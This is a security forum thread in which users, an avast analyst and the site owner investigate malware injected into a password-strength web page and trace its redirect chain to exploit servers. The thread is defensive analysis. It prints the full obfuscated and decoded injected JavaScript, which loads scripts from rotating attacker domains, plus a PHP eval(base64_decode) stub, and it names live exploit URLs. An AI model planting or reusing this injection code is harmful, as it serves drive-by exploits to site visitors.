Analysis of password-strength page at unwrongest website (split from password thread)

Have you guys looked at the Anubis analysis I posted?
That's a lot of info to digest... a 29 page PDF file.
I can't make sense out of most of it, but the summary definitely states that the executable modifies and destructs files which are not temporary, and it reads and modifies registry values. It also creates and monitors registry keys.

 

The avast! web shield is what is acting on these threats, JR.
According to avast!, "The Web Shield scrutinizes all your web browsing activities, and eliminates any online threats even before your web browser sees them". The action taken is abort connection, so nothing is being downloaded.

I think I'll reduce the heuristics and see if the detection is impacted.

Edit in: I reduced the heuristics from high to normal and tried on 2 different computers (after clearing cache, cookies, temp files) and I still got (new) detections...

gold . edisonsnightclub . com / data / mootools . js
&
snow . karengren . com / data / mootools . js

 

Thanks, but I wouldn't want to claim to be able to find everything. Exploits are just too complex/sophisticated these days. I'm just puzzled why nothing seems to happen at that site.

I don't see evidence of an executable...

Also, I'm curious why TrendMicro and others haven't picked up on this exploit, which Avast flagged months ago.

I submitted the URL to jsunpack.jeek.org/ for that .js file:

http://jsunpack.jeek.org/dec/go?report=34ec7e7d65fa483978039563e66272ac08ab2329

On the other hand,

http://sucuri.net/malware/entry/MW:JS:221

And the plot thickens... (I can't remember who first said that)

----
rich

 

FYI, here are the objects that avast! has detected on the unwrongest site...

plum . karenegren . com / data / mootools . js
aqua . karenegren . com / data / mootools . js
snow . karenegren . com / data / mootools . js
gray . edisonsnightclub . com / data / mootools . js
white . edisonsnightclub . com / data / mootools . js
gold . edisonsnightclub . com / data / mootools . js
lime . edisonsnightclub . com / data / mootools . js
brown . emapis . org / data / mootools . js

 

Hello all,

Here are some information about this detection. At first, this is not a false positive. All the files (mootools.js) are currenlty down on the servers, but I found one sample that had been sent through avast UI as a false positive.

You may see the content of detected file in the attached image (snow_karenegren_com_data_mootools_js.png) - not any version of mootoools, isn't it? This is just another step in IllRedir (some call it Pegel) evolution. If you check underlined text on first&second line you will see obfuscated url. This url is shown in the second image (flow) as url used in dynamicaly created iframe.

Please do not try to atempt the second url as it is still active and still redirects into malware ip containing various exploits.

Code:

PDF exploit on the target IP (vt report) http://www.virustotal.com/analisis/16af2b0f548513c98fe738a244933c947a26260706d1ad9b3ca5a65e33b9e99e-1280158545
IllRedir infection (vt report) http://www.virustotal.com/analisis/67e452984612a84a47a321e515ac677551ed81b9ba6e85e1dcd1ecf60d6486f6-1280158560

Best Regards
Jirka Sejtko

 

Hello Jirka
Are you a virus analyst employed by avast?
Also, you noted that, "All the files (mootools.js) are currenlty down on the servers". That must be why when I go to the unwrongest site today, there is now no detection alert from avast.
Thanks for your input.

Edit in: I can answer my own question... I consulted my avast email support files and I see that Jirka Sejtko is a virus analyst for Alwil.

 

Thanks for confirming.

Yesterday, I submitted to JSUNPACK one of those .js files that appeared elsewhere, and it showed benign, evidently because the redirected ideacore.com URL showed benign:

Code:

All Malicious or Suspicious Elements of Submission
None 
[B]aqua . karenegren . com / data / mootools . js benign[/B]

[nothing detected] aqua . karenegren . com / data / mootools . js
  
     info: [decodingLevel=0] found JavaScript
     info: [setAttribute src] URL=[B]i . ideacore . com / in . cgi ? 2[/B]

...


[B]i . ideacore . com / in . cgi ? 2 benign[/B]
[nothing detected] (setAttribute src) i . ideacore . com / in . cgi ? 2
     status: (referer= aqua . karenegren . com / data / mootools . js)

When I tried that URL yesterday, nothing happened. After seeing your post, I tried it again and also the one you cited -- both are happily working to serve up an exploit to IE6, but nothing to Opera on my system:

​

This is a good lesson when using analysis tools, like JSUNPACK: that javascript appeared to be benign, but in fact would redirect to a malicious site.

Another online tool is Wepawet, which has been fooled by obfuscated javascript in exploits.

While I use those tools often, nonetheless, being a skeptic by nature, if I don't see the exploit in action, I have nothing to go on. Hence, my comments in previous posts here as to whether or not the password site is infected.

In many ways, I think as Pete does:

It seems wise to have something in place to protect the system in any case; then, you are covered, no matter the conflicting reports about a site!

----
rich

 

Hello Page42 and others

Yes, I am. As you have found from my email .

Well, this is the question. It seems to me like layered attack using 4 layers:
1.) is malware distribution layer (last IP with exploit pack)
2.) ideacore - last redirection to 1.
3.) karenegren - second redirection - to 2
4.) hack/injection into unwrongest site which redirects into 3.

Layers 1,2,3 are probably operated by the bad guys (please correct me if I'm wrong). 2 and 3 might be hacks too, but these domains are quite new, previously unused. If this is right, then bad guys may renew the content on demand anytime. Only way how to break this attack (by the webmaster) is to find hack on the 4th layer.

Following link contains 4th layer which was probably present on the unwrongest site (found it today, while searching for some more info about the domains).

Code:

http://pastebin.com/KqseJTAA

Regards

 

Jirka
Please check your PM.

 

Hello,

My name is Jan Jarfalk and I'm the owner of Unwrongest. I got an email from 'Screeno' about this thread and the threat detection.

Unwrongest isn't meant to be a malicious site but Avast detection was correct. There were two alien code snippets in the code.

One in jquery-1.3.2.min.js

Code:

var st1 = 0;document.write(unescape('%3C%73%63%72%69%70%74%3E%76%61%72%20%64%63%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%20%76%61%72%20%63%6E%61%6D%65%20%3D%20%27%77%61%74%63%68%74%69%6D%65%27%3B%20%76%61%72%20%77%6E%20%3D%20%77%69%6E%64%6F%77%2E%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%3B%20%76%61%72%20%73%74%72%69%20%3D%20%2F%28%79%61%68%6F%6F%7C%73%65%61%72%63%68%7C%6D%73%6E%62%6F%74%7C%79%61%6E%64%65%78%7C%67%6F%6F%67%6C%65%62%6F%74%7C%62%69%6E%67%7C%61%73%6B%29%2F%69%3B%20%76%61%72%20%73%74%72%4F%53%20%3D%20%6E%61%76%69%67%61%74%6F%72%2E%61%70%70%56%65%72%73%69%6F%6E%3B%20%69%66%28%64%63%2E%69%6E%64%65%78%4F%66%28%63%6E%61%6D%65%29%3D%3D%2D%31%20%26%26%20%21%77%6E%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%6D%61%74%63%68%28%73%74%72%69%29%20%26%26%20%73%74%72%4F%53%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%27%77%69%6E%27%29%20%21%3D%20%2D%31%29%20%7B%20%76%61%72%20%64%6F%6D%73%20%3D%20%5B%27%65%64%69%73%6F%6E%73%6E%69%67%68%74%63%6C%75%62%2E%63%6F%6D%27%2C%27%65%6D%61%70%69%73%2E%6F%72%67%27%2C%27%69%64%65%61%63%6F%72%65%70%6F%72%74%61%6C%2E%63%6F%6D%27%2C%27%6B%61%72%65%6E%65%67%72%65%6E%2E%63%6F%6D%27%5D%3B%20%76%61%72%20%70%72%65%66%66%73%20%3D%20%5B%27%61%71%75%61%2E%27%2C%27%61%7A%75%72%65%2E%27%2C%27%62%6C%61%63%6B%2E%27%2C%27%62%6C%75%65%2E%27%2C%27%62%72%6F%77%6E%2E%27%2C%27%67%6F%6C%64%2E%27%2C%27%67%72%61%79%2E%27%2C%27%67%72%65%65%6E%2E%27%2C%27%6C%69%6D%65%2E%27%2C%27%6E%61%76%79%2E%27%2C%27%6F%6C%69%76%65%2E%27%2C%27%70%6C%75%6D%2E%27%2C%27%72%65%64%2E%27%2C%27%73%6E%6F%77%2E%27%2C%27%77%68%69%74%65%2E%27%2C%27%79%65%6C%6C%6F%77%2E%27%5D%3B%20%76%61%72%20%64%6F%6D%20%3D%20%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%64%6F%6D%73%2E%6C%65%6E%67%74%68%29%3B%20%76%61%72%20%70%72%65%66%20%3D%20%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%70%72%65%66%66%73%2E%6C%65%6E%67%74%68%29%3B%20%64%74%3D%6E%65%77%20%44%61%74%65%28%29%3B%64%74%2E%73%65%74%54%69%6D%65%28%64%74%2E%67%65%74%54%69%6D%65%28%29%20%2B%20%37%2A%33%36%30%30%2A%33%36%30%30%29%3B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3D%63%6E%61%6D%65%2B%27%3D%27%2B%65%73%63%61%70%65%28%63%6E%61%6D%65%29%2B%27%3B%65%78%70%69%72%65%73%3D%27%2B%64%74%2E%74%6F%47%4D%54%53%74%72%69%6E%67%28%29%2B%27%3B%70%61%74%68%3D%2F%27%3B%20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%27%2B%70%72%65%66%66%73%5B%70%72%65%66%5D%2B%64%6F%6D%73%5B%64%6F%6D%5D%2B%27%2F%64%61%74%61%2F%6D%6F%6F%74%6F%6F%6C%73%2E%6A%73%22%3E%3C%5C%2F%73%63%72%69%70%74%3E%27%29%3B%20%7D%3B%3C%2F%73%63%72%69%70%74%3E'));var gr0=0;

And another in footer.php (wordpress template file).

Code:

<?php eval(base64_decode( /* malscript */ ))?>

It looked something like that. I have the complete source at home.

I don't know how they got there... yet, but both, hopefully all, of them are now removed.

Thanks again 'Screeno' for bringing this to my attention.
And Thanks all of you who put an interest in my website.

Update:
Someone with the alias johnnyA has manage to create an admin account for himself.
http://www.michaeljanzen.com/tag/sarkonerrgmail-com/

 

It could be the case of hacking your database password rather than Wordpress security bug. I see both your and michaeljanzen's website are hosted by MEDIA TEMPLE.

 

Hello Jan
Glad you posted here regarding this matter.
FYI, a malware analyzing service named Anubis is still finding problems on your site. (see report dated today) I have no way of knowing if their report is accurate... just wanted to give you a heads up. They have their contact address at the bottom of every page.
Thanks for working to resolve the problem!

 

The Anubis report notes that the malware creates a directory here:

C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer

I am curious about that directory, as it appears on both of the computers on my home LAN, but with widely different creation dates (2002 & 2010). I went to the unwrongest site with both computers.
I believe this directory is standard for IE8 in WinXP, SP3... but I'd like to know what others are thinking.
Since avast flagged the malware and aborted connection to the site, and because I run my browser with limited user account restrictions via OA's RunSafer, I don't think I was impacted by visiting the unwrongest site while it was dishing up the exploit... but I would like to be sure. Any ideas or thoughts?

edit:typo

 

OK All, I have to chime in here as I am also currently cleaning up another system that is also hosted at media-temple. One of my users hit this site from a training class and it servered up some serious fake AV malware. I went searching and narrowed it down to a job bank site. When I contacted the webmaster, (believe it or not) they opened access up for me to "look around" (yes we ARE having the discussion about reverse social engineering).

I located 17 PHP pages with an obfuscated string:

Code:

>>>Begin<<<

	<ads><script type="text/javascript">var st1 = 0; document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%76%61%72%20%61%3D%77%69%6E%64%6F%77%2E%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2C%62%3D%2F%28%79%61%68%6F%6F%7C%73%65%61%72%63%68%7C%6D%73%6E%62%6F%74%7C%79%61%6E%64%65%78%7C%67%6F%6F%67%6C%65%62%6F%74%7C%62%69%6E%67%7C%61%73%6B%29%2F%69%2C%63%3D%6E%61%76%69%67%61%74%6F%72%2E%61%70%70%56%65%72%73%69%6F%6E%3B%20%69%66%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E%69%6E%64%65%78%4F%66%28%22%77%61%74%63%68%74%69%6D%65%22%29%3D%3D%2D%31%26%26%21%61%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%6D%61%74%63%68%28%62%29%26%26%63%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%22%77%69%6E%22%29%21%3D%2D%31%29%7B%76%61%72%20%64%3D%5B%22%65%64%69%73%6F%6E%73%6E%69%67%68%74%63%6C%75%62%2E%63%6F%6D%22%2C%22%67%61%69%6E%64%69%72%65%63%74%6F%72%79%2E%6F%72%67%22%2C%22%69%64%65%61%63%6F%72%65%70%6F%72%74%61%6C%2E%63%6F%6D%22%2C%22%6B%61%72%65%6E%65%67%72%65%6E%2E%63%6F%6D%22%5D%2C%65%3D%5B%22%61%71%75%61%2E%22%2C%22%61%7A%75%72%65%2E%22%2C%22%62%6C%61%63%6B%2E%22%2C%22%62%6C%75%65%2E%22%2C%22%62%72%6F%77%6E%2E%22%2C%22%63%68%6F%63%6F%6C%61%74%65%2E%22%2C%22%63%6F%72%61%6C%2E%22%2C%22%63%79%61%6E%2E%22%2C%22%64%61%72%6B%72%65%64%2E%22%2C%22%66%75%63%68%73%69%61%2E%22%2C%22%67%6F%6C%64%2E%22%2C%22%67%72%61%79%2E%22%2C%22%67%72%65%65%6E%2E%22%2C%22%69%6E%64%69%67%6F%2E%22%2C%22%69%76%6F%72%79%2E%22%2C%22%6B%68%61%6B%69%2E%22%2C%22%6C%69%6D%65%2E%22%2C%22%6D%61%67%65%6E%74%61%2E%22%2C%22%6D%61%72%6F%6F%6E%2E%22%2C%22%6E%61%76%79%2E%22%2C%22%6F%6C%69%76%65%2E%22%2C%22%6F%72%61%6E%67%65%2E%22%2C%22%70%69%6E%6B%2E%22%2C%22%70%6C%75%6D%2E%22%2C%22%70%75%72%70%6C%65%2E%22%2C%22%72%65%64%2E%22%2C%22%73%69%6C%76%65%72%2E%22%2C%22%73%6E%6F%77%2E%22%2C%22%76%69%6F%6C%65%74%2E%22%2C%22%77%68%69%74%65%2E%22%2C%22%79%65%6C%6C%6F%77%2E%22%5D%2C%66%3D%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%20%64%2E%6C%65%6E%67%74%68%29%2C%67%3D%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%65%2E%6C%65%6E%67%74%68%29%3B%64%74%3D%6E%65%77%20%44%61%74%65%3B%64%74%2E%73%65%74%54%69%6D%65%28%64%74%2E%67%65%74%54%69%6D%65%28%29%2B%39%30%37%32%45%34%29%3B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3D%22%77%61%74%63%68%74%69%6D%65%3D%22%2B%65%73%63%61%70%65%28%22%77%61%74%63%68%74%69%6D%65%22%29%2B%22%3B%65%78%70%69%72%65%73%3D%22%2B%64%74%2E%74%6F%47%4D%54%53%74%72%69%6E%67%28%29%2B%22%3B%70%61%74%68%3D%2F%22%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%27%2B%65%5B%67%5D%2B%64%5B%66%5D%2B%27%2F%64%61%74%61%2F%6D%6F%6F%74%6F%6F%6C%73%2E%6A%73%22%3E%3C%5C%2F%73%63%72%69%70%74%3E%27%29%7D%3B%3C%2F%73%63%72%69%70%74%3E'));var gr0=0;</script></ads>		

<<<End>>>

When I extracted the encoded string, this is what I got:

Code:

<<<Begin clear code>>>>

	<ads><script type="text/javascript">var st1 = 0; document.write(unescape('<script type="text/javascript">var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("watchtime")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["edisonsnightclub.com","gaindirectory.org","ideacoreportal.com","karenegren.com"],e=["aqua.","azure.","black.","blue.","brown.","chocolate.","coral.","cyan.","darkred.","fuchsia.","gold.","gray.","green.","indigo.","ivory.","khaki.","lime.","magenta.","maroon.","navy.","olive.","orange.","pink.","plum.","purple.","red.","silver.","snow.","violet.","white.","yellow."],f=Math.floor(Math.random()* d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="watchtime="+escape("watchtime")+";expires="+dt.toGMTString()+";path=/";document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/data/mootools.js"><\/script>')};</script>'));var gr0=0;</script></ads>	


<<<End Clear code>>>>

You will see how each of the sites you are mentioning are selected. This is a very complex piece of code. It looks at the default search engine and modifies its response first to that. Then it appears to select a "color" based upon the browser that directs it to the .js file.

Running a W3AF scan against this site revealed about 2 dozen CSRF vulnerabilities, a couple XST (cross site tracing vulnerabilities) and one blind SQL injection. It also idenitified a shared hosting due to the code above.

I will post a more detailed analysis when I get through with it.

 

MBAM Protection Module is doing an IP-block on 94.75.243.31 when I visit the unwrongest website...

 

I took another look at this site. Using Opera, nothing happens.

Using my trusty unpatched IE6, I noticed briefly ipwn.ws in the status bar. Indeed, several exploits are served up from that domain, including a PDF exploit. The first malware file attempted to download as the Adobe splash screen appeared:

and an IE6 exploit, either JAVA or MDAC; IE crashed, so I couldn't get a screen shot of the browser window, but the executable file attemped to download/run:



​

I cannot tell how ipwn.ws is being called - the code is very obfuscated. Perhaps GTO_Jeff or someone else with analysis tools will come back with further information.



REFERENCES

Domain matching ipwn.ws were found in our database.
http://www.malwareurl.com/listing.php?domain=ipwn.ws

ipwn.ws
http://siteadvisor.es/sites/ipwn.ws/postid?p=4994919

This is a summary of what was observed on ipwn.ws.
http://wepawet.iseclab.org/domain.php?hash=aab8832e6833674355c6ca562e3b9882&type=js

Analysis report for one of the PDF files
http://wepawet.iseclab.org/view.php?hash=7ad3986fcf31700e1e9e73697f363f07&t=1280408815&type=js



----
rich

 

Using Opera, I was able to see that the exploits are being loaded via an i-frame. Different i-frames come up on subsequent connections to the site. However, none of the exploits are triggered in Opera.

This one is the URL for the Java exploit that I looked at in Post 36:

​

This one serves up the exploits in my previous post.

​

I think when using IE, both exploits are triggered, because I got the JAVA emblem along with the others.

----
rich

 

Hi Page42,

that directory is normal default in my neck of the woods on Win 7 x64. Browsing all throughout the site using FF 3.6.8 or IE8, I'm unable to notice one iota of infection occur. Nothing in AppLocker events to indicate anything nefarious. This is boring Is this site only hazardous to those running outdated software?

 

Visted -www.unwrongest.com/projects/password-strength- with unpatched IE6 and ALL scripting and active x and iframes prompts allowed. No java on here. Apart from seeing this nothing happened ?



Went directly several times to find out what's there -http://ipwn.ws:80/myothersoldier/redtapeaghast.php?unique=1- is now -http://ipwn.ws/myothersoldier/snazzyboss.php- on there are all sorts of crud









Next